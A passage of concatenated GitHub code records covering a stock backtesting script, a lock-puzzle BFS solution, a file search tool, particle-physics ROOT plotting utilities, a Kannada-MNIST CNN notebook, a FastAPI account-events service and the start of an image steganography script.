self.I(EMA, price, 27)\r\n self.ema3 = self.I(EMA, price, 200)\r\n def next(self):\r\n if crossover(self.ema1, self.ema3):\r\n self.buy()\r\n elif crossover(self.ema3, self.ema1) and crossover(self.ema2, self.ema1):\r\n self.sell()\r\n\r\nclass RSISystem(Strategy):\r\n def init(self):\r\n price= self.data.Close\r\n self.RSIData = self.I(RSI,price,14)\r\n self.ema3 = self.I(EMA, price, 5)\r\n self.ema4 = self.I(EMA, price, 10)\r\n def next(self):\r\n if not self.position and self.RSIData<30 and crossover(self.ema4, self.ema3): \r\n self.buy()\r\n elif self.RSIData>70 and crossover(self.ema3, self.ema4):\r\n if self.position.size>0:\r\n self.position.close()\r\n\r\n# stock = pdr.get_data_yahoo(symbols='SPY', start = datetime.today()-timedelta(days=3652), end =datetime.today())\r\nstock = pdr.get_data_yahoo(symbols='SPY', start = '2011-12-1', end ='2021-12-1')\r\n\r\nbt = Backtest(stock, EMAC,cash=10000, commission = 0.000,\r\n exclusive_orders= True)\r\n\r\nprint(bt.run())","repo_name":"DanielPace14/Backtesting","sub_path":"Backtesting.py","file_name":"Backtesting.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5663480593","text":"from collections import deque \n\nclass Solution:\n def openLock(self, deadends: List[str], target: str) -> int:\n queue = deque()\n\n queue.append([[\"0\", \"0\", \"0\", \"0\"], 0])\n turns = 0 \n deadends = set(deadends)\n visited = set()\n while queue:\n currentNode, cost = queue.popleft()\n # print(currentNode, cost)\n tuplified = tuple(currentNode)\n if tuplified in visited:\n continue \n currentString = \"\".join(currentNode)\n if currentString == target:\n return cost \n if currentString in deadends:\n continue \n\n \n visited.add(tuple(currentNode))\n for index, char in enumerate(currentNode):\n newChar = getNextChar(char)\n newChar2 = getPrevChar(char)\n tempCopy = currentNode[:]\n tempCopy2 = currentNode[:]\n tempCopy[index] = newChar \n tempCopy2[index] = newChar2\n queue.append([tempCopy, cost + 1])\n queue.append([tempCopy2, cost + 1])\n \n\n \n return -1\n \n \ndef getPrevChar(currentChar):\n current = int(currentChar)\n current -= 1 \n if current < 0:\n current = 9 \n return str(current)\n \ndef getNextChar(currentChar):\n current = int(currentChar)\n current += 1 \n if current == 10:\n current = 0 \n return str(current)","repo_name":"KaiKaizxc/Data-stuctures-and-algo","sub_path":"Graphs/752. Open the Lock.py","file_name":"752. Open the Lock.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"9743495224","text":"\nimport devon, devon.projects\nfrom devon.tags import *\nimport fnmatch, glob, mmap, os.path, re, sys\n\nreNewLine = re.compile(\"\\n\")\n\n# **************************************************************************************************\n\ndef search(path, terms, out, replaceTerms=None, fileTypes=None, caseSensitive=True):\n if not terms:\n return 0\n\n return searchDir(path, terms, replaceTerms, out, fileTypes, caseSensitive)\n\ndef searchProject(project, terms, out, replaceTerms=None, fileTypes=None, caseSensitive=True):\n if not terms:\n return 0\n \n projectFilePath = os.path.join(project.path, devon.projects.projectFileName)\n \n paths = [projectFilePath] \\\n + project.getSources() \\\n + project.getTestSources()\n\n if fileTypes:\n patterns = fileTypes.split(\",\")\n def fileFilter(path, patterns):\n for pattern in patterns:\n if fnmatch.fnmatch(path, pattern.strip()):\n return True\n return False\n paths = [path for path in paths if fileFilter(path, patterns)]\n\n findCount = 0\n\n for filePath in paths:\n fullPath = os.path.join(project.path, filePath)\n if os.path.isfile(fullPath) and isSearchable(fullPath):\n findCount += searchFile(fullPath, terms, replaceTerms, out, caseSensitive)\n \n for childProject in project.getChildProjects():\n findCount += searchProject(childProject, terms, out, \\\n replaceTerms, fileTypes, caseSensitive)\n\n return findCount\n \ndef searchDir(path, terms, replaceTerms, out, fileTypes):\n findCount = 0\n \n if fileTypes:\n dirNames = glob.glob(os.path.join(path, fileTypes))\n else:\n dirNames = os.listdir(path)\n\n for dirName in dirNames:\n if not dirName[0] == \".\":\n dirPath = os.path.join(path, dirName)\n if os.path.isdir(dirPath):\n findCount += searchDir(dirPath, terms, out)\n else:\n findCount += searchFile(dirPath, terms, out)\n\n return findCount\n \ndef searchFile(path, terms, replaceTerms, out, caseSensitive):\n findCount = 0\n \n reFlags = 0\n if not caseSensitive:\n reFlags |= re.IGNORECASE\n\n reTerms = re.compile(re.escape(terms), reFlags)\n\n if not replaceTerms == None:\n fd = os.open(path, os.O_RDWR)\n size = os.fstat(fd).st_size\n if size == 0:\n os.close(fd)\n return 0\n else:\n source = mmap.mmap(fd, size, access=mmap.ACCESS_WRITE)\n newSource, count = re.subn(reTerms, replaceTerms, source)\n source.close()\n \n if count == 0:\n os.close(fd)\n return 0 \n else:\n os.lseek(fd, 0, 0)\n os.ftruncate(fd, len(newSource))\n os.write(fd, newSource)\n os.close(fd)\n return count\n\n fd = os.open(path, os.O_RDONLY)\n size = os.fstat(fd).st_size\n if size == 0:\n os.close(fd)\n return 0\n else: \n source = mmap.mmap(fd, size, access=mmap.ACCESS_READ)\n \n termsLen = len(terms)\n index = 0\n while 1:\n m = reTerms.search(source, index)\n if not m:\n break\n \n findCount += 1\n index = m.start()\n \n lineCount, lineBegin, lineEnd = countLines(source, index)\n snippet = source[lineBegin:lineEnd]\n col1 = m.start()-lineBegin+1\n col2 = m.end()-lineBegin+1\n \n out << Header(level=2) \\\n << FileLink(path=path, lineNo=lineCount, colNo1=col1, \\\n colNo2=col2, rowType=\"primary\") \\\n << \"%s (line %s)\" % (path, lineCount) \\\n << Close \\\n << Close \\\n << CodeBlock(\"log log-snippet\") << snippet << Close << Flush\n\n index += termsLen\n\n source.close()\n os.close(fd)\n\n return findCount\n \ndef countLines(source, endPos):\n lines = 0\n lineBegin = 0\n lineEnd = 0\n \n index = 0\n while index <= endPos:\n m = reNewLine.search(source, index)\n if not m:\n break\n else:\n index = m.end()\n lines += 1\n lineBegin = lineEnd\n lineEnd = index\n \n return lines, lineBegin, lineEnd\n \ndef isSearchable(path):\n name, ext = os.path.splitext(path)\n name = os.path.basename(name)\n return (not name == \"pch.h\") and not ext in [\".jpg\", \".jpeg\", \".png\", \".gif\", \".psd\", \".pyc\", \".jssc\"]\n ","repo_name":"joehewitt/devon","sub_path":"devon/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"22"} +{"seq_id":"24346881143","text":"import numpy as np\nimport ROOT\nimport pyhepmc\nimport os\nfrom array import array\n\ndef get_model_setup(model,setup=None):\n\n masses = couplings = decays = None\n\n if model==\"DarkPhoton\":\n \n #pids=[[-11, 11],[-13,13],[999,999]]\n decays=[\"e_e\",\"mu_mu\",\"had\"]\n \n masses = [ \n 0.01 ,\n 0.0501,\n 0.1585,\n 0.3548,\n 0.6457,\n 0.7586,\n 0.8913,\n 1.2589,\n 2.8184\n ]\n couplings=np.logspace(-8,-3,20)\n \n \n masses=[0.1585]\n couplings=[1.2742749857031322e-06]\n\n \n \n elif model==\"DarkHiggs\":\n #decays=[\"e_e\",\"mu_mu\",\"pi_pi\",\"4pi\",\"K_K\",\"other\"]\n #decays=[\"e_e\",\"mu_mu\",\"pi_pi\",\"K_K\"]\n decays=[\"e_e\"]\n \n \n masses = [ \n 0.1 , \n 0.2239, \n 0.5012, \n 0.6918, \n 0.8128, \n 0.955 ,\n 1.5849, \n 3.5 ,\n 11.22 , \n 25.119\n ]\n\n couplings=np.logspace(-6,-3,20)\n \n #masses = [0.6918]\n #couplings = [0.001]\n \n # Use full mass-coupling fidelity (same as original FORESEE reach plots)\n if setup and setup == \"full\":\n masses = [\n 0.1 , 0.1122, 0.1259, 0.1413, 0.1585, 0.1778, 0.1995, \n 0.2239, 0.2512, 0.2818, 0.3162, 0.3548, 0.3981, 0.4467, \n 0.5012, 0.5623, 0.6026, 0.631 , 0.6457, 0.6607, 0.6761, \n 0.6918, 0.7079, 0.7244, 0.7413, 0.7586, 0.7762, 0.7943, \n 0.8128, 0.8318, 0.8511, 0.871 , 0.8913, 0.912 , 0.9333, \n 0.955 , 0.9772, 1. , 1.122 , 1.2589, 1.4125, 1.5 ,\n 1.5849, 1.7783, 1.9953, 2.2387, 2.5119, 2.8184, 3.1623, \n 3.5 , 3.7 , 3.9811, 5.0119, 6.3096, 7.9433, 10. ,\n 11.22 , 12.589, 14.125, 15.849, 17.783, 19.953, 22.387, \n 25.119, 28.184, 31.623, 39.811, 50.119, 55.000, 60.000,\n 63.096, 79.430, 99.9\n ]\n couplings=np.logspace(-8,-3,20)\n\n else:\n print(f\"ERROR: Couldn't find setup for model {model}\")\n\n return masses,couplings,decays\n\n\n\ndef clear_csvs(runmode,setup,currdir,outdir,energy):\n if runmode==\"eff\":\n if \"G4\" not in setup:\n return\n for G4setup in setup[\"G4\"]:\n for station in setup[\"stations\"]:\n for eff in setup[\"effs\"]:\n effname=f\"{currdir}/{outdir}/eff_{energy}TeV_{G4setup}_station{station}_{eff}.csv\"\n print(f\"Clearing eff file {effname}\")\n efffile = open(effname,'w')\n efffile.close()\n\n\ndef get_effs(hepname,sumall,sumeffs,outroot,decay,station,effs):\n \n # get xs from hepmc\n if not os.path.exists(hepname):\n print(f\"HepMC file {hepname} not found - skipping\")\n return sumall,sumeffs\n \n xs=0.\n print(\"JOSH2\",hepname)\n with pyhepmc.open(hepname) as f:\n print(\"JOSH3\")\n event = f.read()\n print(\"JOSH4\")\n xs=event.cross_section.xsec()\n print(\"Found cross section:\",xs)\n print(\"JOSH5\")\n if not os.path.exists(outroot):\n print(f\"ROOT file {outroot} not found - skipping\")\n return sumall,sumeffs\n\n print(f\"Working on ROOT file {outroot}\")\n \n try:\n f_eff=ROOT.TFile.Open(outroot,\"READ\")\n except:\n print(f\"ERROR: ROOT file {outroot} not opened properly\")\n return sumall,sumeffs\n \n t_eff = f_eff.Get(f\"Hits{station}\")\n if not t_eff:\n print(f\"ERROR: TTree Hits{station} not opened properly\")\n return sumall,sumeffs\n\n \n varp=''\n varm=''\n if decay==\"e_e\":\n varp='ep'\n varm='em'\n elif decay==\"mu_mu\":\n varp='mp'\n varm='mm'\n else:\n varp='hp'\n varm='hm'\n \n # Just use this to make a histogram, doesn't really matter what the variable is\n vary=varp+'_y' \n print(f\"Using var {vary}\")\n \n # Get total number of events\n hall=ROOT.TH1F(\"hall\",\"hall\",1000,0,10000) \n t_eff.Draw(f\"{vary}>>hall\");\n # Normalise to cross section\n sumall+=hall.Integral()*xs\n print(f\"decay = {decay}, all =\",hall.Integral(),xs,hall.Integral()*xs)\n \n # Get number of events passing each efficiency cut\n for n,(effval,efftitle,effstring) in enumerate(effs):\n # Correct eff string to be for relevant object in root file\n effstring=effstring.replace('ep',varp).replace('em',varm)\n heff=ROOT.TH1F(\"heff\",\"heff\",1000,0,10000)\n t_eff.Draw(f\"{vary}>>heff\",effstring)\n \n print(f\"decay = {decay},\",effstring,\",\",effs[n],\"=\",heff.Integral(),xs,heff.Integral()*xs)\n sumeffs[n]+=heff.Integral()*xs\n\n f_eff.Close()\n \n return sumall,sumeffs\n\n\ndef plot_seps(currdir,outdir,energy,mass,coup,decay,G4setup,setup_name):\n infile=f\"{currdir}/{outdir}/events_{energy}TeV_m{mass}GeV_c{coup}_to_{decay}_s1_{G4setup}.root\"\n if not os.path.exists(infile):\n print(f\"ROOT file {infile} not found - skipping\")\n return\n \n \n ROOT.gStyle.SetOptStat(0)\n ROOT.gStyle.SetOptTitle(0)\n \n f_L1 = ROOT.TFile.Open(infile)\n t_L1 = f_L1.Get(\"Hits1\")\n \n f_L2 = ROOT.TFile.Open(infile)\n t_L2 = f_L2.Get(\"Hits2\")\n \n f_L3 = ROOT.TFile.Open(infile)\n t_L3 = f_L3.Get(\"Hits3\")\n \n nbins = 50\n xmin = 1e-3\n xmax = 1e5\n logxmin = ROOT.TMath.Log10(xmin)\n logxmax = ROOT.TMath.Log10(xmax)\n binwidth = (logxmax-logxmin)/nbins\n xbins = [xmin]\n for i in range(1,nbins+1) :\n xbins.append(float(xmin + ROOT.TMath.Power(10,logxmin+i*binwidth)))\n \n \n c1 = ROOT.TCanvas(\"c1\",\"c1\")\n \n #print(xmin,array('d',xbins))\n \n h_dy_L1 = ROOT.TH1D(\"h_dy_L1\",\"h_dy_L1\",nbins,array('d',xbins))\n print(t_L1,h_dy_L1)\n t_L1.Draw(\"abs(ep_y-em_y)>>h_dy_L1\")\n print(h_dy_L1)\n \n h_dy_L2 = ROOT.TH1D(\"h_dy_L2\",\"h_dy_L2\",nbins,array('d',xbins))\n t_L2.Draw(\"abs(ep_x-em_x)>>h_dy_L2\")\n \n h_dy_L3 = ROOT.TH1D(\"h_dy_L3\",\"h_dy_L3\",nbins,array('d',xbins))\n t_L3.Draw(\"abs(ep_x-em_x)>>h_dy_L3\")\n \n if h_dy_L1.Integral(): h_dy_L1.Scale(1./h_dy_L1.Integral())\n if h_dy_L2.Integral(): h_dy_L2.Scale(1./h_dy_L2.Integral())\n if h_dy_L3.Integral(): h_dy_L3.Scale(1./h_dy_L3.Integral())\n\n \n h_dy_L1.SetMaximum(1.1*ROOT.TMath.Max(h_dy_L1.GetMaximum(),h_dy_L3.GetMaximum()))\n h_dy_L1.GetXaxis().SetTitle(\"Separation [mm]\")\n h_dy_L1.GetXaxis().SetTitleSize(0.045)\n \n h_dy_L1.SetLineColor(ROOT.kBlue+1)\n h_dy_L1.SetLineWidth(3)\n h_dy_L1.Draw(\"hist\")\n \n h_dy_L2.SetLineStyle(ROOT.kDashed)\n h_dy_L2.SetLineColor(ROOT.kBlue+1)\n h_dy_L2.SetLineWidth(3)\n h_dy_L2.Draw(\"histsame\")\n\n h_dy_L3.SetLineStyle(ROOT.kDotted)\n h_dy_L3.SetLineColor(ROOT.kBlue+1)\n h_dy_L3.SetLineWidth(3)\n h_dy_L3.Draw(\"histsame\")\n\n \n c1.SetLogx()\n c1.SetTickx()\n c1.SetTicky()\n \n leg = ROOT.TLegend(0.7,0.85,0.85,0.6)\n leg.SetBorderSize(0)\n leg.SetFillColor(0)\n leg.SetTextSize(0.04)\n leg.AddEntry(h_dy_L1,\"Station 1\",\"l\")\n leg.AddEntry(h_dy_L2,\"Station 2\",\"l\")\n leg.AddEntry(h_dy_L3,\"Station 3\",\"l\")\n \n leg.Draw()\n \n latex = ROOT.TLatex()\n latex.SetNDC()\n latex.SetTextFont(42)\n latex.SetTextSize(0.06)\n latex.DrawLatex(0.15,0.8,\"#bf{#it{FASER2}}\")\n latex.SetTextSize(0.05)\n latex.DrawLatex(0.32,0.8,setup_name)\n latex.SetTextSize(0.04)\n\n latex2 = ROOT.TLatex()\n latex2.SetNDC()\n latex2.SetTextFont(42)\n latex2.SetTextSize(0.04)\n latex2.DrawLatex(0.15,0.75,f\"m={mass} GeV\")\n latex2.DrawLatex(0.15,0.7,f\"#varepsilon={coup:.5g}\")\n latex2.SetTextSize(0.04)\n\n c1.SaveAs(f\"{currdir}/{outdir}/plot_sep_stations_{energy}TeV_m{mass}GeV_c{coup}_to_{decay}_s1_{G4setup}.pdf\")\n","repo_name":"joshmcfayden/FASER2_GenSim","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"69947780538","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\n\n\nimport os\n\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n\n for filename in filenames:\n\n print(os.path.join(dirname, filename))\n\n\n\n# Any results you write to the current directory are saved as output.\ntrain = '/kaggle/input/Kannada-MNIST/train.csv'\n\ntest = '/kaggle/input/Kannada-MNIST/test.csv'\n\n\n\ndataset = pd.read_csv(train)\n\ndataset_test = pd.read_csv(test)\n\ndataset_test = dataset_test.drop(['id'], axis = 1)\n\n\n\nfeatures = dataset.drop(['label'], axis = 1)\n\nlabels = dataset['label']\n\ndataset_test.head()\nfeatures = features.values\n\nfeatures_test = dataset_test.values\n\nprint(features.shape)\n\nprint(features_test.shape)\n\n\n\nfeatures = features.reshape((features.shape[0], 28, 28))\n\nfeatures_test = features_test.reshape((features_test.shape[0], 28, 28))\n\n\n\nprint(features.shape)\n\nprint(features_test.shape)\nfrom keras.utils import np_utils\n\n\n\nseed = 300\n\ntest_size = 0.2\n\n\n\n# Import train_test_split\n\nfrom sklearn.model_selection import train_test_split\n\n# Split the 'features' and 'labels' data into training and testing sets\n\nX_train, X_test, y_train, y_test = train_test_split(features, labels, test_size = test_size, random_state = seed, stratify=labels)\n\n#X_test, X_valid, y_train, y_valid = train_test_split(X_test, y_test, test_size = 0.1, random_state = seed)\n\n\n\nX_train = np.repeat(X_train[..., np.newaxis], 1, -1)\n\nX_test = np.repeat(X_test[..., np.newaxis], 1, -1)\n\nfeatures_test = np.repeat(features_test[..., np.newaxis], 1, -1)\n\n\n\ny_train = np_utils.to_categorical(np.array(y_train), 10)\n\ny_test = np_utils.to_categorical(np.array(y_test), 10)\n\n\n\nprint(\"features set has {} samples.\".format(features.shape))\n\nprint(\"Training set has {} samples.\".format(X_train.shape))\n\nprint(\"Testing set has {} samples.\".format(X_test.shape))\n\n#print(\"Valid set has {} samples.\".format(X_valid.shape[0]\n\n\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D\n\nfrom keras.layers import Dropout, Flatten, Dense, BatchNormalization\n\nfrom keras.models import Sequential\n\n\n\nmodel = Sequential()\n\n\n\nmodel.add(Conv2D(filters=16, kernel_size=5, padding='same', activation='relu', input_shape=(28, 28, 1)))\n\nmodel.add(Conv2D(filters=16, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(BatchNormalization())\n\nmodel.add(MaxPooling2D(pool_size=2))\n\nmodel.add(Dropout(0.4))\n\n\n\nmodel.add(Conv2D(filters=32, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(Conv2D(filters=32, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(BatchNormalization())\n\nmodel.add(MaxPooling2D(pool_size=2))\n\nmodel.add(Dropout(0.4))\n\n\n\nmodel.add(Conv2D(filters=64, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(Conv2D(filters=64, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(BatchNormalization())\n\nmodel.add(MaxPooling2D(pool_size=2))\n\nmodel.add(Dropout(0.4))\n\n\n\nmodel.add(Flatten())\n\nmodel.add(Dense(512, activation='relu'))\n\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(1024, activation='relu'))\n\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(10, activation='softmax'))\n\n\n\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nfrom keras.callbacks import ModelCheckpoint \n\n\n\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n\n\nWEIGHTS_FILE = 'weights.base.hdf5'\n\n### TODO: specify the number of epochs that you would like to use to train the model.\n\n\n\nepochs = 100\n\n\n\n### Do NOT modify the code below this line.\n\n\n\ncheckpointer = ModelCheckpoint(filepath='WEIGHTS_FILE', \n\n verbose=1, save_best_only=True)\n\n\n\nhistory = model.fit(X_train, \n\n y_train, \n\n validation_data=(X_test, y_test),\n\n epochs=epochs, \n\n batch_size=200, \n\n callbacks=[checkpointer], \n\n verbose=1)\nimport matplotlib.pyplot as plt\n\nimport numpy\n\n\n\ndef plot_history(history):\n\n # summarize history for accuracy\n\n plt.plot(history.history['accuracy'])\n\n plt.plot(history.history['val_accuracy'])\n\n plt.title('model accuracy')\n\n plt.ylabel('accuracy')\n\n plt.xlabel('epoch')\n\n plt.legend(['train', 'test'], loc='upper left')\n\n plt.show()\n\n # summarize history for loss\n\n plt.plot(history.history['loss'])\n\n plt.plot(history.history['val_loss'])\n\n plt.title('model loss')\n\n plt.ylabel('loss')\n\n plt.xlabel('epoch')\n\n plt.legend(['train', 'test'], loc='upper left')\n\n plt.show()\nplot_history(history)\nprint(features_test.shape)\n\n# get index of predicted dog breed for each image in test set\n\npredictions = [np.argmax(model.predict(np.expand_dims(tensor, axis=0))) for tensor in features_test]\n\n\n\nprint(np.array(predictions))\nprint(np.array(predictions))\n\npredictions_df = pd.DataFrame(np.array(predictions), columns = ['Label'])\n\npredictions_df.reset_index(level=0, inplace=True)\n\npredictions_df.columns = ['id', 'label']\n\npredictions_df.index += 1 \n\npredictions_df.to_csv('predictions.csv', index = False)\n\npredictions_df.head()","repo_name":"aorursy/new-nb-5","sub_path":"mrugeles_kannada-mnist.py","file_name":"mrugeles_kannada-mnist.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"73427564215","text":"\"\"\"FastAPI blueprint, that contains events manipulation methods.\"\"\"\n\nimport datetime as dt\n\nfrom fastapi import APIRouter, Depends\nfrom pydantic import BaseModel\nfrom sqlalchemy import desc, select\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.orm import sessionmaker\n\nfrom .utils.exceptions import LogicException\nfrom .utils.models import (\n UserModel,\n EventModel,\n SavePointModel,\n create_account_entry,\n)\nfrom .user import authorized_user\nfrom .utils.database import get_session\n\n\nrouter = APIRouter()\n\n\nasync def _update_or_create_savepoint(\n session: AsyncSession, user_id, account_id, event_time: dt.datetime\n):\n # event in the start of the month is not accounted for\n # in the savepoint at a same time, it would be in a next savepoint\n month_start = event_time.replace(\n day=1, hour=0, minute=0, second=0, microsecond=0\n )\n query = (\n await session.execute(\n select(SavePointModel)\n .where(SavePointModel.user_id == user_id)\n .where(SavePointModel.account_id == account_id)\n .where(SavePointModel.datetime < event_time)\n .order_by(desc(SavePointModel.datetime))\n )\n ).first()\n\n if not query: # earliest savepoint\n savepoint = await create_account_entry(\n session,\n SavePointModel,\n user_id=user_id,\n account_id=account_id,\n datetime=month_start,\n total=0,\n )\n session.add(savepoint)\n elif query[0].datetime < month_start: # new savepoint\n query = await session.execute(\n select(EventModel.diff)\n .where(EventModel.user_id == user_id)\n .where(EventModel.account_id == account_id)\n .where(EventModel.event_time >= savepoint.datetime)\n .where(EventModel.event_time < month_start)\n )\n\n savepoint = await create_account_entry(\n session,\n SavePointModel,\n user_id=user_id,\n account_id=account_id,\n datetime=month_start,\n total=savepoint.total + sum(diff for (diff,) in query.all()),\n )\n session.add(savepoint)\n\n\nasync def _update_latter_savepoints(\n session: AsyncSession, user_id, account_id, event_time: dt.datetime, diff\n):\n savepoints = (\n await session.execute(\n select(SavePointModel)\n .where(SavePointModel.user_id == user_id)\n .where(SavePointModel.account_id == account_id)\n .where(SavePointModel.datetime >= event_time)\n )\n ).all()\n for (savepoint,) in savepoints:\n savepoint.total += diff\n\n\nclass EventData(BaseModel):\n account_id: int\n category_id: int\n event_time: int\n diff: int\n description: str\n\n\n@router.post(\"/create_event\")\nasync def create_event(\n event_data: EventData,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Request to create new event.\"\"\"\n event_time = dt.datetime.fromtimestamp(event_data.event_time)\n session: AsyncSession\n async with async_session() as session:\n event: EventModel = await create_account_entry(\n session,\n EventModel,\n user_id=current_user.id,\n account_id=event_data.account_id,\n category_id=event_data.category_id,\n event_time=event_time,\n diff=event_data.diff,\n description=event_data.description,\n )\n session.add(event)\n await _update_or_create_savepoint(\n session, current_user.id, event_data.account_id, event_time\n )\n await _update_latter_savepoints(\n session,\n current_user.id,\n event_data.account_id,\n event_time,\n event_data.diff,\n )\n await session.commit()\n return {\"status\": \"OK\", \"event\": event.to_dict()}\n\n\nclass GetEventsRequest(BaseModel):\n account_id: int\n start_time: int | None = None\n end_time: int | None = None\n\n\n@router.post(\"/get_events\")\nasync def get_events(\n request: GetEventsRequest,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Get all events user has.\"\"\"\n query = (\n select(EventModel)\n .where(EventModel.user_id == current_user.id)\n .where(EventModel.account_id == request.account_id)\n )\n if request.start_time:\n query = query.where(\n EventModel.event_time\n > dt.datetime.fromtimestamp(request.start_time)\n )\n if request.end_time:\n query = query.where(\n EventModel.event_time < dt.datetime.fromtimestamp(request.end_time)\n )\n session: AsyncSession\n async with async_session() as session:\n events = await session.execute(query)\n return {\n \"status\": \"OK\",\n \"events\": [event.to_dict() for (event,) in events.all()],\n }\n\n\nclass EditEventRequest(BaseModel):\n event_id: int\n account_id: int\n category_id: int\n event_time: int\n diff: int\n description: str\n\n\n@router.post(\"/edit_event\")\nasync def edit_event(\n request: EditEventRequest,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Request to edit event.\"\"\"\n session: AsyncSession\n async with async_session() as session:\n event: EventModel = await session.get(\n EventModel,\n (current_user.id, request.account_id, request.event_id),\n )\n if event is None:\n raise LogicException(\"no such event\")\n\n event_time = dt.datetime.fromtimestamp(request.event_time)\n old_event_time: dt.datetime = event.event_time\n old_diff = event.diff\n\n event.category_id = request.category_id\n event.event_time = event_time\n event.diff = request.diff\n event.description = request.description\n\n if old_event_time != event_time:\n await _update_latter_savepoints(\n session,\n current_user.id,\n event.account_id,\n old_event_time,\n -request.diff,\n )\n await _update_or_create_savepoint(\n session, current_user.id, event.account_id, event_time\n )\n await _update_latter_savepoints(\n session,\n current_user.id,\n event.account_id,\n event_time,\n request.diff,\n )\n elif old_diff != request.diff:\n await _update_latter_savepoints(\n session,\n current_user.id,\n event.account_id,\n event_time,\n request.diff - old_diff,\n )\n await session.commit()\n\n return {\"status\": \"OK\", \"event\": event.to_dict()}\n\n\nclass DeleteEventRequest(BaseModel):\n account_id: int\n event_id: int\n\n\n@router.post(\"/delete_event\")\nasync def delete_event(\n request: DeleteEventRequest,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Delete existing event.\"\"\"\n session: AsyncSession\n async with async_session() as session:\n async with session.begin():\n event: EventModel = await session.get(\n EventModel,\n (current_user.id, request.account_id, request.event_id),\n )\n if event is None:\n raise LogicException(\"no such event\")\n\n await session.delete(event)\n # TODO remove savepoint if event is a last one\n await _update_latter_savepoints(\n session,\n current_user.id,\n event.account_id,\n event.event_time,\n -event.diff,\n )\n\n return {\"status\": \"OK\", \"event\": event.to_dict()}\n\n\nclass GetBalanceRequest(BaseModel):\n account_id: int\n timestamp: int\n\n\n@router.post(\"/get_balance\")\nasync def get_balance(\n request: GetBalanceRequest,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Get balance on certain account at certain time.\"\"\"\n timepoint = dt.datetime.fromtimestamp(request.timestamp)\n\n session: AsyncSession\n async with async_session() as session:\n query = (\n await session.execute(\n select(SavePointModel)\n .where(SavePointModel.user_id == current_user.id)\n .where(SavePointModel.account_id == request.account_id)\n .where(SavePointModel.datetime <= timepoint)\n .order_by(desc(SavePointModel.datetime))\n )\n ).first()\n\n print(\"!\", query)\n\n if not query:\n return {\"status\": \"OK\", \"balance\": 0}\n\n (savepoint,) = query\n query = await session.execute(\n select(EventModel.diff)\n .where(EventModel.user_id == current_user.id)\n .where(EventModel.account_id == request.account_id)\n .where(EventModel.event_time >= savepoint.datetime)\n .where(EventModel.event_time < timepoint)\n )\n return {\n \"status\": \"OK\",\n \"balance\": savepoint.total + sum(diff for (diff,) in query.all()),\n }\n\n\nasync def get_category_total(\n session: AsyncSession, account_id, category_id, start_time, end_time\n):\n \"\"\"\n Get total income for given time in given category.\n\n start_time and end_time are both datetime.\n \"\"\"\n query = await session.execute(\n select(EventModel.diff)\n .where(EventModel.account_id == account_id)\n .where(EventModel.category_id == category_id)\n .where(EventModel.event_time >= start_time)\n .where(EventModel.event_time < end_time)\n )\n return sum(diff for (diff,) in query.all())\n","repo_name":"GreenBlackSky/COIN","sub_path":"api_service/app/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"71867376055","text":"from bitstring import Bits\nfrom PIL import Image\nimport argparse\n\nargument_parser = argparse.ArgumentParser(\n description=\"This tool allows you to read hidden messages from images. Use the -m argument to hide the message\"\n \" into the image instead.\")\nargument_parser.add_argument(\"filename\", help=\"filename of the image you want to process\", type=str)\nargument_parser.add_argument(\"-m\", \"--message\", help=\"the message you want to hide into the image\", type=str)\n\nargs = argument_parser.parse_args()\n\nimage = Image.open(args.filename)\nwidth, height = image.size\n\n# hide message\nif args.message is not None:\n message_bytes = bytes(args.message, encoding='utf-8')\n\n byte_capacity = width * height * 3 // 8 # how many bytes can be hidden into the image\n if byte_capacity < len(message_bytes):\n print(\"The message is too long to fit into the image.\")\n exit(1)\n\n # convert the message bytes into a string of ones and zeros\n bits = \"\"\n for byte in message_bytes:\n bits += Bits(int=byte, length=9)[1:].bin\n\n # end sequence - byte of ones is invalid utf-8 byte\n # the zero in the beginning is there to prevent the end sequence merging with the previous byte that might be ending\n # with a one\n bits += \"011111111\"\n\n # a little performance optimization - no need to iterate over the image pixels after the message was hidden\n finished_writing = False\n\n writing_bit_index = 0\n for x in range(0, width):\n for y in range(0, height):\n pixel_to_update = list(image.getpixel((x, y))) # iterating over pixels 